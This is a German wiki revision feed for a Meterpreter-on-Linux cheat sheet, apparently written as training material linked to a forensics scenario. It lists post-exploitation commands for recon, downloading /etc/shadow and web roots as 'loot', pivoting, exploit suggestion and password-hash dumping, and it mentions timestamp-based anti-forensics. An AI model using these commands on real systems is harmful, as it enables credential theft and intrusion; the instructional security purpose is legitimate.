<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="de">
	<id>https://xinux.net/index.php?action=history&amp;feed=atom&amp;title=Meterpreter_unter_Linux</id>
	<title>Meterpreter unter Linux - Versionsgeschichte</title>
	<link rel="self" type="application/atom+xml" href="https://xinux.net/index.php?action=history&amp;feed=atom&amp;title=Meterpreter_unter_Linux"/>
	<link rel="alternate" type="text/html" href="https://xinux.net/index.php?title=Meterpreter_unter_Linux&amp;action=history"/>
	<updated>2026-08-23T19:44:33Z</updated>
	<subtitle>Versionsgeschichte dieser Seite in Xinux Wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://xinux.net/index.php?title=Meterpreter_unter_Linux&amp;diff=72693&amp;oldid=prev</id>
		<title>Thomas.will: /* Nicht verfügbar unter Linux */</title>
		<link rel="alternate" type="text/html" href="https://xinux.net/index.php?title=Meterpreter_unter_Linux&amp;diff=72693&amp;oldid=prev"/>
		<updated>2026-08-14T07:16:47Z</updated>

		<summary type="html">&lt;p&gt;&lt;span dir=&quot;auto&quot;&gt;&lt;span class=&quot;autocomment&quot;&gt;Nicht verfügbar unter Linux&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;table class=&quot;diff diff-contentalign-left diff-editfont-monospace&quot; data-mw=&quot;interface&quot;&gt;
				&lt;col class=&quot;diff-marker&quot; /&gt;
				&lt;col class=&quot;diff-content&quot; /&gt;
				&lt;col class=&quot;diff-marker&quot; /&gt;
				&lt;col class=&quot;diff-content&quot; /&gt;
				&lt;tr class=&quot;diff-title&quot; lang=&quot;de&quot;&gt;
				&lt;td colspan=&quot;2&quot; style=&quot;background-color: #fff; color: #202122; text-align: center;&quot;&gt;← Nächstältere Version&lt;/td&gt;
				&lt;td colspan=&quot;2&quot; style=&quot;background-color: #fff; color: #202122; text-align: center;&quot;&gt;Version vom 14. August 2026, 07:16 Uhr&lt;/td&gt;
				&lt;/tr&gt;&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot; id=&quot;mw-diff-left-l106&quot; &gt;Zeile 106:&lt;/td&gt;
&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;Zeile 106:&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;;Passwort-Hashes auslesen (nur als root)&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;;Passwort-Hashes auslesen (nur als root)&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;*run post/linux/gather/hashdump&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;*run post/linux/gather/hashdump&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;&lt;/del&gt;&lt;/div&gt;&lt;/td&gt;&lt;td colspan=&quot;2&quot;&gt; &lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;== Nicht verfügbar unter Linux ==&lt;/del&gt;&lt;/div&gt;&lt;/td&gt;&lt;td colspan=&quot;2&quot;&gt; &lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;&lt;/del&gt;&lt;/div&gt;&lt;/td&gt;&lt;td colspan=&quot;2&quot;&gt; &lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;* &amp;lt;code&amp;gt;timestomp&amp;lt;/code&amp;gt; – nur Windows. Anti-Forensik unter Linux läuft über&lt;/del&gt;&lt;/div&gt;&lt;/td&gt;&lt;td colspan=&quot;2&quot;&gt; &lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;  &amp;lt;code&amp;gt;touch -d&amp;lt;/code&amp;gt;, nicht über Meterpreter.&lt;/del&gt;&lt;/div&gt;&lt;/td&gt;&lt;td colspan=&quot;2&quot;&gt; &lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;&lt;del style=&quot;font-weight: bold; text-decoration: none;&quot;&gt;* Registry-, Token- und Kiwi/Mimikatz-Kommandos entfallen mangels Windows-Basis.&lt;/del&gt;&lt;/div&gt;&lt;/td&gt;&lt;td colspan=&quot;2&quot;&gt; &lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;== Bezug zum Angriffsszenario ==&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;== Bezug zum Angriffsszenario ==&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;

&lt;!-- diff cache key my_wiki:diff::1.12:old-72692:rev-72693 --&gt;
&lt;/table&gt;</summary>
		<author><name>Thomas.will</name></author>
	</entry>
	<entry>
		<id>https://xinux.net/index.php?title=Meterpreter_unter_Linux&amp;diff=72692&amp;oldid=prev</id>
		<title>Thomas.will am 14. August 2026 um 07:16 Uhr</title>
		<link rel="alternate" type="text/html" href="https://xinux.net/index.php?title=Meterpreter_unter_Linux&amp;diff=72692&amp;oldid=prev"/>
		<updated>2026-08-14T07:16:23Z</updated>

		<summary type="html">&lt;p&gt;&lt;/p&gt;
&lt;table class=&quot;diff diff-contentalign-left diff-editfont-monospace&quot; data-mw=&quot;interface&quot;&gt;
				&lt;col class=&quot;diff-marker&quot; /&gt;
				&lt;col class=&quot;diff-content&quot; /&gt;
				&lt;col class=&quot;diff-marker&quot; /&gt;
				&lt;col class=&quot;diff-content&quot; /&gt;
				&lt;tr class=&quot;diff-title&quot; lang=&quot;de&quot;&gt;
				&lt;td colspan=&quot;2&quot; style=&quot;background-color: #fff; color: #202122; text-align: center;&quot;&gt;← Nächstältere Version&lt;/td&gt;
				&lt;td colspan=&quot;2&quot; style=&quot;background-color: #fff; color: #202122; text-align: center;&quot;&gt;Version vom 14. August 2026, 07:16 Uhr&lt;/td&gt;
				&lt;/tr&gt;&lt;tr&gt;&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot; id=&quot;mw-diff-left-l1&quot; &gt;Zeile 1:&lt;/td&gt;
&lt;td colspan=&quot;2&quot; class=&quot;diff-lineno&quot;&gt;Zeile 1:&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt;−&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;= &lt;del class=&quot;diffchange diffchange-inline&quot;&gt;Meterpreter unter Linux &lt;/del&gt;=&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt;+&lt;/td&gt;&lt;td style=&quot;color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;=&lt;ins class=&quot;diffchange diffchange-inline&quot;&gt;= Grundsätliches =&lt;/ins&gt;=&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;Meterpreter ist die interaktive Payload des Metasploit-Frameworks. Sie läuft im&lt;/div&gt;&lt;/td&gt;&lt;td class='diff-marker'&gt; &lt;/td&gt;&lt;td style=&quot;background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;&quot;&gt;&lt;div&gt;Meterpreter ist die interaktive Payload des Metasploit-Frameworks. Sie läuft im&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/table&gt;</summary>
		<author><name>Thomas.will</name></author>
	</entry>
	<entry>
		<id>https://xinux.net/index.php?title=Meterpreter_unter_Linux&amp;diff=72691&amp;oldid=prev</id>
		<title>Thomas.will: Die Seite wurde neu angelegt: „= Meterpreter unter Linux =  Meterpreter ist die interaktive Payload des Metasploit-Frameworks. Sie läuft im Speicher des kompromittierten Prozesses und stell…“</title>
		<link rel="alternate" type="text/html" href="https://xinux.net/index.php?title=Meterpreter_unter_Linux&amp;diff=72691&amp;oldid=prev"/>
		<updated>2026-08-14T07:15:58Z</updated>

		<summary type="html">&lt;p&gt;Die Seite wurde neu angelegt: „= Meterpreter unter Linux =  Meterpreter ist die interaktive Payload des Metasploit-Frameworks. Sie läuft im Speicher des kompromittierten Prozesses und stell…“&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Neue Seite&lt;/b&gt;&lt;/p&gt;&lt;div&gt;= Meterpreter unter Linux =&lt;br /&gt;
&lt;br /&gt;
Meterpreter ist die interaktive Payload des Metasploit-Frameworks. Sie läuft im&lt;br /&gt;
Speicher des kompromittierten Prozesses und stellt einen einheitlichen Befehlssatz&lt;br /&gt;
zur Verfügung, unabhängig von der darunterliegenden Shell. Der Linux-Payload bietet&lt;br /&gt;
weniger Kommandos als die Windows-Variante – alles rund um Registry, Tokens oder&lt;br /&gt;
Timestomping fehlt.&lt;br /&gt;
&lt;br /&gt;
'''Hinweis:''' Der Befehl &amp;lt;code&amp;gt;help&amp;lt;/code&amp;gt; zeigt in der laufenden Session, welche&lt;br /&gt;
Kommandos der konkrete Payload tatsächlich unterstützt. Ein&lt;br /&gt;
&amp;lt;code&amp;gt;python/meterpreter&amp;lt;/code&amp;gt; kann weniger als der native ELF-Payload.&lt;br /&gt;
&lt;br /&gt;
== Session-Verwaltung ==&lt;br /&gt;
&lt;br /&gt;
;Session in den Hintergrund legen, zurück zur msf-Konsole&lt;br /&gt;
*background&lt;br /&gt;
&lt;br /&gt;
;Vorhandene Sessions anzeigen&lt;br /&gt;
*sessions -l&lt;br /&gt;
&lt;br /&gt;
;Session wieder aufnehmen&lt;br /&gt;
*sessions -i ID&lt;br /&gt;
&lt;br /&gt;
;Kontextbezogene Befehlsliste anzeigen&lt;br /&gt;
*help&lt;br /&gt;
&lt;br /&gt;
;Ruby-Konsole im Kontext der Session&lt;br /&gt;
*irb&lt;br /&gt;
&lt;br /&gt;
== System und Recon ==&lt;br /&gt;
&lt;br /&gt;
;Betriebssystem, Architektur, Hostname&lt;br /&gt;
*sysinfo&lt;br /&gt;
&lt;br /&gt;
;Unter welchem Benutzer läuft die Session&lt;br /&gt;
*getuid&lt;br /&gt;
&lt;br /&gt;
;Eigene Prozess-ID&lt;br /&gt;
*getpid&lt;br /&gt;
&lt;br /&gt;
;Prozessliste&lt;br /&gt;
*ps&lt;br /&gt;
&lt;br /&gt;
;In eine normale System-Shell wechseln&lt;br /&gt;
*shell&lt;br /&gt;
&lt;br /&gt;
;Vollwertiges TTY in der Shell nachrüsten&lt;br /&gt;
*python3 -c 'import pty; pty.spawn(&amp;quot;/bin/bash&amp;quot;)'&lt;br /&gt;
&lt;br /&gt;
== Dateisystem ==&lt;br /&gt;
&lt;br /&gt;
;Verzeichnis anzeigen und wechseln&lt;br /&gt;
*pwd&lt;br /&gt;
*ls&lt;br /&gt;
*cd /var/www&lt;br /&gt;
&lt;br /&gt;
;Datei anzeigen&lt;br /&gt;
*cat /etc/passwd&lt;br /&gt;
&lt;br /&gt;
;Datei vom Ziel herunterladen&lt;br /&gt;
*download /etc/shadow /tmp/loot/shadow&lt;br /&gt;
&lt;br /&gt;
;Ganzes Verzeichnis rekursiv herunterladen&lt;br /&gt;
*download -r /var/www /tmp/loot/www&lt;br /&gt;
&lt;br /&gt;
;Datei auf das Ziel hochladen&lt;br /&gt;
*upload /tmp/tools/linpeas.sh /tmp/linpeas.sh&lt;br /&gt;
&lt;br /&gt;
;Dateien suchen&lt;br /&gt;
*search -f *.conf&lt;br /&gt;
&lt;br /&gt;
;Prüfsumme bilden&lt;br /&gt;
*checksum sha1 /usr/bin/verdaechtig&lt;br /&gt;
&lt;br /&gt;
== Netzwerk und Pivoting ==&lt;br /&gt;
&lt;br /&gt;
;Netzwerk-Interfaces anzeigen&lt;br /&gt;
*ifconfig&lt;br /&gt;
&lt;br /&gt;
;Aktive Verbindungen&lt;br /&gt;
*netstat&lt;br /&gt;
&lt;br /&gt;
;Routing-Tabelle&lt;br /&gt;
*route&lt;br /&gt;
&lt;br /&gt;
;Lokales Port-Forwarding einrichten&lt;br /&gt;
*portfwd add -l 3389 -p 3389 -r 10.254.31.50&lt;br /&gt;
&lt;br /&gt;
;Route über die Session für weitere Module setzen&lt;br /&gt;
*run autoroute -s 10.254.31.0/24&lt;br /&gt;
&lt;br /&gt;
== Post-Module ==&lt;br /&gt;
&lt;br /&gt;
Post-Module sind keine Meterpreter-Builtins, sondern werden mit &amp;lt;code&amp;gt;run&amp;lt;/code&amp;gt;&lt;br /&gt;
aus der Session heraus gestartet.&lt;br /&gt;
&lt;br /&gt;
;Passende lokale Privilege-Escalation-Exploits vorschlagen&lt;br /&gt;
*run post/multi/recon/local_exploit_suggester&lt;br /&gt;
&lt;br /&gt;
;Systemübersicht sammeln&lt;br /&gt;
*run post/linux/gather/enum_system&lt;br /&gt;
&lt;br /&gt;
;Konfigurationsdateien einsammeln&lt;br /&gt;
*run post/linux/gather/enum_configs&lt;br /&gt;
&lt;br /&gt;
;Passwort-Hashes auslesen (nur als root)&lt;br /&gt;
*run post/linux/gather/hashdump&lt;br /&gt;
&lt;br /&gt;
== Nicht verfügbar unter Linux ==&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;timestomp&amp;lt;/code&amp;gt; – nur Windows. Anti-Forensik unter Linux läuft über&lt;br /&gt;
  &amp;lt;code&amp;gt;touch -d&amp;lt;/code&amp;gt;, nicht über Meterpreter.&lt;br /&gt;
* Registry-, Token- und Kiwi/Mimikatz-Kommandos entfallen mangels Windows-Basis.&lt;br /&gt;
&lt;br /&gt;
== Bezug zum Angriffsszenario ==&lt;br /&gt;
&lt;br /&gt;
Der &amp;lt;code&amp;gt;local_exploit_suggester&amp;lt;/code&amp;gt; schlägt bei einem ungepatchten System mit&lt;br /&gt;
verwundbarem &amp;lt;code&amp;gt;pkexec&amp;lt;/code&amp;gt; direkt CVE-2019-13272 vor – denselben Weg, über den&lt;br /&gt;
im Forensik-Szenario das Binary &amp;lt;code&amp;gt;ptrace_traceme_root&amp;lt;/code&amp;gt; ins Root-Home gelangt&lt;br /&gt;
ist. Damit schließt sich der Kreis von der Angreifer- zur Verteidiger-Perspektive.&lt;/div&gt;</summary>
		<author><name>Thomas.will</name></author>
	</entry>
</feed>